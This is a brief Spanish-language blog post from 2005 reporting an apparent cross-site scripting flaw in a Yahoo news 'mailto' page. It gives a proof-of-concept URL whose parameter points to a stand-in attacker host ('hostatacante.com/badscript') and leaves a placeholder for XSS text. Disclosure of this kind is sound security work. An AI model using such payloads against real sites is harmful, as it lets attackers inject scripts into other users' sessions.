ecoestadistica.com

jueves, diciembre 22, 2005

Bug en Yahoo...???

Un atacante puede manipular datos de entrada del URL en Yahoo, esto puede ser explotado para la entrada de cualquier script creada por un intruso.

Prueba de Concepto:

http://de.mf.news.yahoo.com/mailto?url=http://hostatacante.com/badscript&title
=[aqui texto XSS]

AQUI UN EJEMPLO

Salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com